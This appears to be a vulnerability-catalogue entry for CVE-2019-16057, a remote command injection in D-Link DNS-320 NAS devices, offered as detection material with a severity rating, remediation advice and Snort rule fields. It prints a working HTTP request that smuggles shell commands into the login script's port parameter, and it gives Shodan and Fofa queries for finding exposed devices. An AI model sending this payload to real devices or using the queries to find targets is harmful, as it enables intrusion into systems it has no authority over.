🔙 목록으로 돌아가기

CVE-2019-16057: D-Link DNS-320 - Remote Code Execution

TitleD-Link DNS-320 - Remote Code Execution
AuthorDhiyaneshDk
SeverityCritical
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access, data loss, and potential compromise of the affected device.
RemediationApply the latest firmware update provided by D-Link to mitigate this vulnerability.
CVSS Score9.8
EPSS Score0.9375
CVE IDCVE-2019-16057
CWE IDCWE-78
Shodan Queryhtml:"ShareCenter"http.html:"sharecenter"
Fofa Querybody="sharecenter"
Tags cve cve2019 lfi rce kev sharecenter dlink vkev vuln

🔍 Vulnerability Description

The login_mgr.cgi script in D-Link DNS-320 through 2.05.B10 is vulnerable to remote command injection.

🌐 HTTP Request

GET /cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-16057.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-16057.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A